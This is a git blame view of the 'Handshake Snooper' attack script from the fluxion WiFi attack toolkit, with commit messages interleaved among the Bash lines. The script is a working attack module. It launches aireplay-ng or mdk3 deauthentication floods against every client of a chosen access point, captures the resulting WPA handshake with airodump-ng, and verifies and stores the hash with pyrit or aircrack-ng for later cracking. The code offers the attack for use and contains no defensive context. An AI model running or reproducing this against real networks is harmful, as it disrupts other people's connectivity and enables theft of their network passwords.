Mirrors
/
fluxion
mirror of https://github.com/FluxionNetwork/fluxion.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
fluxion/attacks/Handshake Snooper/attack.sh

220 lines
6.7 KiB
Bash
Raw Normal View History

Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
#!/bin/bash
########################### < Handshake Snooper Parameters > ###########################
HandshakeSnooperState="Not Ready"
################################# < Handshake Snooper > ################################
function handshake_verifier_daemon() {
if [ ${#@} -lt 5 ]; then return 1; fi
Minor improvements to Handshake Snooper.
2017-11-28 21:46:00 -07:00
local handshakeVerifierState="running"
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
function handle_verifier_abort() {
handshakeVerifierState="aborted"
Minor improvements to Handshake Snooper.
2017-11-28 21:46:00 -07:00
if [ "$handshakeVerifierXtermPID" ]; then kill $handshakeVerifierXtermPID; fi
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
}
trap handle_verifier_abort SIGABRT
source lib/HashUtils.sh
Minor improvements to Handshake Snooper.
2017-11-28 21:46:00 -07:00
source lib/ColorUtils.sh
Fix bad translation, add ui for handshake
2017-09-10 05:20:08 -06:00
Minor improvements to Handshake Snooper.
2017-11-28 21:46:00 -07:00
echo "Waiting for handshake data." > $FLUXIONWorkspacePath/result.txt
echo "" >> $FLUXIONWorkspacePath/result.txt
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
Minor improvements to Handshake Snooper.
2017-11-28 21:46:00 -07:00
# Display some feedback to the user to assure verifier is working.
xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg "#CCCCCC" -title "Handshake Snooper Verifier" -e "while (true); do clear; cat $FLUXIONWorkspacePath/result.txt; sleep 3; done" &
local handshakeVerifierXtermPID=$!
local handshakeCheckResult=1 # Assume invalid initially
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
while [ $handshakeCheckResult -ne 0 -a "$handshakeVerifierState" = "running" ]; do
Minor improvements to Handshake Snooper.
2017-11-28 21:46:00 -07:00
echo "[$(date '+%H:%M:%S')] Waiting for valid hash..." >> $FLUXIONWorkspacePath/result.txt
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
sleep 3
Minor improvements to Handshake Snooper.
2017-11-28 21:46:00 -07:00
Fixed mawk vs gawk bug & added missing quotes.
2017-08-09 22:30:23 -06:00
pyrit -r "$4" -o "${4/.cap/-clean.cap}" stripLive
Minor improvements to Handshake Snooper.
2017-11-28 21:46:00 -07:00
Fixed mawk vs gawk bug & added missing quotes.
2017-08-09 22:30:23 -06:00
hash_check_handshake "$3" "${4/.cap/-clean.cap}" "${@:5:2}"
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
handshakeCheckResult=$?
done
Minor improvements to Handshake Snooper.
2017-11-28 21:46:00 -07:00
echo "" > $FLUXIONWorkspacePath/result.txt
#sleep 5 && kill $handshakeVerifierXtermPID &
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
# If handshake didn't pass verification, it was aborted.
Minor improvements to Handshake Snooper.
2017-11-28 21:46:00 -07:00
if [ $handshakeCheckResult -ne 0 ]; then
echo -e "${CRed}Error${CClr}: No valid handshake found." >> $FLUXIONWorkspacePath/result.txt
return 1
else
echo -e "${CGrn}Success${CClr}: A valid handshake was found!" >> $FLUXIONWorkspacePath/result.txt
fi
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
Fixed handshake directory missing bug.
2017-08-09 17:36:23 -06:00
# Assure we've got a directory to store hashes into.
local hashDirectory=$(dirname "$2")
if [ ! -d "$hashDirectory" ]; then
mkdir -p "$hashDirectory"
fi
# Move handshake to storage if one was acquired.
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
mv "${4/.cap/-clean.cap}" "$2"
# Signal parent process the verification terminated.
kill -s SIGABRT $1
}
function handshake_stop_verifier() {
if [ "$HANDSHAKEVerifierPID" ]; then
kill -s SIGABRT $HANDSHAKEVerifierPID &> $FLUXIONOutputDevice
fi
HANDSHAKEVerifierPID=""
}
function handshake_start_verifier() {
handshake_verifier_daemon $$ \
Lang. globals, paths, exitmode update & bugfixes. Updated fluxion and attacks scripts to use the updated language global identifiers. Quoted some paths that handn't already been quoted (potential spacing issues). Updated the exitmode function to deal with FLUXION-started only processes. Fixed a bug where the "WI not supported" message was displayed when no AP were found. Added an IO function to handle dynamic, static-text, substitution.
2017-08-10 21:02:12 -06:00
"$FLUXIONPath/attacks/Handshake Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap" \
"$HANDSHAKEVerifier" "$FLUXIONWorkspacePath/capture/dump-01.cap" \
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
"$APTargetSSID" "$APTargetMAC" &> $FLUXIONOutputDevice &
HANDSHAKEVerifierPID=$!
}
function handshake_stop_deauthenticator() {
if [ "$HANDSHAKEDeauthenticatorPID" ]; then
kill $HANDSHAKEDeauthenticatorPID &> $FLUXIONOutputDevice
fi
HANDSHAKEDeauthenticatorPID=""
}
function handshake_start_deauthenticator() {
if [ "$HANDSHAKEDeauthenticatorPID" ]; then return 0; fi
Fixed missing spacers, transitions & captorPID bug. Added all missing spacers after a choice operation (missing echo). Rearranged fluxion_header algorithm to make transitions smoother. Fixed a bug where captorPID might be missed (not waiting [enough] for it).
2017-08-12 20:23:22 -06:00
handshake_stop_deauthenticator
Fixed an issue with the mdk3 deauthenticator.
2017-08-08 14:55:24 -06:00
# Prepare deauthenticators
case "$HANDSHAKEMethod" in
Lang. globals, paths, exitmode update & bugfixes. Updated fluxion and attacks scripts to use the updated language global identifiers. Quoted some paths that handn't already been quoted (potential spacing issues). Updated the exitmode function to deal with FLUXION-started only processes. Fixed a bug where the "WI not supported" message was displayed when no AP were found. Added an IO function to handle dynamic, static-text, substitution.
2017-08-10 21:02:12 -06:00
"$HandshakeSnooperMdk3MethodOption") echo "$APTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst
Fixed an issue with the mdk3 deauthenticator.
2017-08-08 14:55:24 -06:00
esac
# Start deauthenticators.
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
case "$HANDSHAKEMethod" in
Revert "aireplay-ng deauth sleep fix"
2017-11-26 10:36:47 -07:00
"$HandshakeSnooperAireplayMethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \
aireplay-ng --deauth=9999999999 -a $APTargetMAC --ignore-negative-one $WIMonitor &
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
HANDSHAKEDeauthenticatorPID=$!;;
Lang. globals, paths, exitmode update & bugfixes. Updated fluxion and attacks scripts to use the updated language global identifiers. Quoted some paths that handn't already been quoted (potential spacing issues). Updated the exitmode function to deal with FLUXION-started only processes. Fixed a bug where the "WI not supported" message was displayed when no AP were found. Added an IO function to handle dynamic, static-text, substitution.
2017-08-10 21:02:12 -06:00
"$HandshakeSnooperMdk3MethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \
Fixed an issue with the mdk3 deauthenticator.
2017-08-08 14:55:24 -06:00
mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $APTargetChannel &
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
HANDSHAKEDeauthenticatorPID=$!;;
esac
}
function handshake_stop_captor() {
if [ "$HANDSHAKECaptorPID" ]; then
kill $HANDSHAKECaptorPID &> $FLUXIONOutputDevice
fi
HANDSHAKECaptorPID=""
}
function handshake_start_captor() {
if [ "$HANDSHAKECaptorPID" ]; then return 0; fi
Fixed missing spacers, transitions & captorPID bug. Added all missing spacers after a choice operation (missing echo). Rearranged fluxion_header algorithm to make transitions smoother. Fixed a bug where captorPID might be missed (not waiting [enough] for it).
2017-08-12 20:23:22 -06:00
handshake_stop_captor
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
xterm -hold -title "Handshake Captor (CH $APTargetChannel)" $TOPRIGHT -bg "#000000" -fg "#FFFFFF" -e \
Added airodump-ng negative one suppression flag.
2017-08-18 15:00:17 -06:00
airodump-ng --ignore-negative-one -d $APTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $APTargetChannel -a $WIMonitor &
Minor improvements to Handshake Snooper.
2017-11-28 21:46:00 -07:00
HANDSHAKECaptorPID=$! # Target the xterm, since we won't need to keep it around.
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
Fixed missing spacers, transitions & captorPID bug. Added all missing spacers after a choice operation (missing echo). Rearranged fluxion_header algorithm to make transitions smoother. Fixed a bug where captorPID might be missed (not waiting [enough] for it).
2017-08-12 20:23:22 -06:00
echo -e "$FLUXIONVLine Captor process is starting, please wait..."
Minor improvements to Handshake Snooper.
2017-11-28 21:46:00 -07:00
#while [ ! "$HANDSHAKECaptorPID" ]; do
Fixed missing spacers, transitions & captorPID bug. Added all missing spacers after a choice operation (missing echo). Rearranged fluxion_header algorithm to make transitions smoother. Fixed a bug where captorPID might be missed (not waiting [enough] for it).
2017-08-12 20:23:22 -06:00
# Here, we'll wait for the airodump-ng PID, since we want to leave the xterm open.
# This is because we need to have a method of notifying the user the hash is captured.
# Once the hash is captured, we can terminate the captor and the xterm will freeze.
Minor improvements to Handshake Snooper.
2017-11-28 21:46:00 -07:00
# HANDSHAKECaptorPID=$(ps a | awk '$5~/^airodump-ng/ && $8~/'"$APTargetMAC"'/{print $1}')
# sleep 1
#done
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
}
function handshake_unset_method() {
HANDSHAKEMethod=""
}
function handshake_set_method() {
if [ "$HANDSHAKEMethod" ]; then return 0; fi
Fixed missing spacers, transitions & captorPID bug. Added all missing spacers after a choice operation (missing echo). Rearranged fluxion_header algorithm to make transitions smoother. Fixed a bug where captorPID might be missed (not waiting [enough] for it).
2017-08-12 20:23:22 -06:00
handshake_unset_method
Lang. globals, paths, exitmode update & bugfixes. Updated fluxion and attacks scripts to use the updated language global identifiers. Quoted some paths that handn't already been quoted (potential spacing issues). Updated the exitmode function to deal with FLUXION-started only processes. Fixed a bug where the "WI not supported" message was displayed when no AP were found. Added an IO function to handle dynamic, static-text, substitution.
2017-08-10 21:02:12 -06:00
local methods=("$HandshakeSnooperMonitorMethodOption" "$HandshakeSnooperAireplayMethodOption" "$HandshakeSnooperMdk3MethodOption" "$FLUXIONGeneralBackOption")
io_query_choice "$HandshakeSnooperMethodQuery" methods[@]
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
HANDSHAKEMethod=$IOQueryChoice
Fixed missing spacers, transitions & captorPID bug. Added all missing spacers after a choice operation (missing echo). Rearranged fluxion_header algorithm to make transitions smoother. Fixed a bug where captorPID might be missed (not waiting [enough] for it).
2017-08-12 20:23:22 -06:00
echo
Lang. globals, paths, exitmode update & bugfixes. Updated fluxion and attacks scripts to use the updated language global identifiers. Quoted some paths that handn't already been quoted (potential spacing issues). Updated the exitmode function to deal with FLUXION-started only processes. Fixed a bug where the "WI not supported" message was displayed when no AP were found. Added an IO function to handle dynamic, static-text, substitution.
2017-08-10 21:02:12 -06:00
if [ "$HANDSHAKEMethod" = "$FLUXIONGeneralBackOption" ]; then
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
handshake_unset_method
return 1
fi
}
function handshake_unset_verifier() {
HANDSHAKEVerifier=""
}
function handshake_set_verifier() {
if [ "$HANDSHAKEVerifier" ]; then return 0; fi
Lang. globals, paths, exitmode update & bugfixes. Updated fluxion and attacks scripts to use the updated language global identifiers. Quoted some paths that handn't already been quoted (potential spacing issues). Updated the exitmode function to deal with FLUXION-started only processes. Fixed a bug where the "WI not supported" message was displayed when no AP were found. Added an IO function to handle dynamic, static-text, substitution.
2017-08-10 21:02:12 -06:00
local choices=("$FLUXIONHashVerificationMethodPyritOption" "$FLUXIONHashVerificationMethodAircrackOption" "$FLUXIONGeneralBackOption")
io_query_choice "$FLUXIONHashVerificationMethodQuery" choices[@]
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
Fixed missing spacers, transitions & captorPID bug. Added all missing spacers after a choice operation (missing echo). Rearranged fluxion_header algorithm to make transitions smoother. Fixed a bug where captorPID might be missed (not waiting [enough] for it).
2017-08-12 20:23:22 -06:00
echo
Lang. globals, paths, exitmode update & bugfixes. Updated fluxion and attacks scripts to use the updated language global identifiers. Quoted some paths that handn't already been quoted (potential spacing issues). Updated the exitmode function to deal with FLUXION-started only processes. Fixed a bug where the "WI not supported" message was displayed when no AP were found. Added an IO function to handle dynamic, static-text, substitution.
2017-08-10 21:02:12 -06:00
case "$IOQueryChoice" in
"$FLUXIONHashVerificationMethodPyritOption") HANDSHAKEVerifier="pyrit";;
"$FLUXIONHashVerificationMethodAircrackOption") HANDSHAKEVerifier="aircrack-ng";;
Fix bad translation, add ui for handshake
2017-09-10 05:20:08 -06:00
"$FLUXIONGeneralBackOption")
Lang. globals, paths, exitmode update & bugfixes. Updated fluxion and attacks scripts to use the updated language global identifiers. Quoted some paths that handn't already been quoted (potential spacing issues). Updated the exitmode function to deal with FLUXION-started only processes. Fixed a bug where the "WI not supported" message was displayed when no AP were found. Added an IO function to handle dynamic, static-text, substitution.
2017-08-10 21:02:12 -06:00
handshake_unset_verifier
handshake_unset_method
return 1;;
esac
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
}
function unprep_attack() {
HandshakeSnooperState="Not Ready"
handshake_unset_verifier
handshake_unset_method
sandbox_remove_workfile "$FLUXIONWorkspacePath/capture"
}
function prep_attack() {
Lang. globals, paths, exitmode update & bugfixes. Updated fluxion and attacks scripts to use the updated language global identifiers. Quoted some paths that handn't already been quoted (potential spacing issues). Updated the exitmode function to deal with FLUXION-started only processes. Fixed a bug where the "WI not supported" message was displayed when no AP were found. Added an IO function to handle dynamic, static-text, substitution.
2017-08-10 21:02:12 -06:00
mkdir -p "$FLUXIONWorkspacePath/capture"
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 12:21:46 -06:00
while true; do
handshake_set_method; if [ $? -ne 0 ]; then break; fi
handshake_set_verifier; if [ $? -ne 0 ]; then continue; fi
HandshakeSnooperState="Ready"
break
done
# Check for handshake abortion.
if [ "$HandshakeSnooperState" = "Not Ready" ]; then
unprep_attack
return 1;
fi
}
function stop_attack() {
handshake_stop_deauthenticator
handshake_stop_verifier
handshake_stop_captor
handshake_unset_verifier
}
# Parameters: path, SSID, MAC
function start_attack() {
handshake_start_captor
handshake_start_deauthenticator
handshake_start_verifier
}
# FLUXSCRIPT END